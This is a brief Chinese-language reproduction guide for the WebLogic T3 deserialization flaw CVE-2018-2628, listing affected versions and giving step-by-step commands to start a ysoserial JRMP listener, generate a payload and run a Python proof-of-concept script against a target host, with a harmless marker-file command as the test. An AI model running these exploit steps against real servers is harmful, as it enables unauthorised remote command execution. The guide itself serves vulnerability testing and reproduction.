漏洞概述     CVE-2018-2628），该漏洞通过t3协议触发，可导致未授权的用户在远程服务器执行任意命令   影响版本：      Weblogic 10.3.6.0      Weblogic 12.1.3.0      Weblogic 12.2.1.2      Weblogic 12.2.1.3   漏洞复现          1.通过下载ysoserial启动一个JRMP Listener,开启22801端口，执行命令为'touch /tmp/121212'       2.根据上一步的JRMP Listener生成payload java -jar ysoserial-<version>-cve-2018-2628-all.jar JRMPClient3 <JRMPListener IP>:<JRMPListener Port> | xxd -p | tr -d $'\n' && echo       3执行POC脚本  python wls-cve-2018-2628-poc.py 目标IP 目标端口       4.查看JRMP Listener是否有反应       5.查看目标机器上/tmp路径下是否生成121212   复现参考地址 https://github.com/tdy218/ysoserial-cve-2018-2628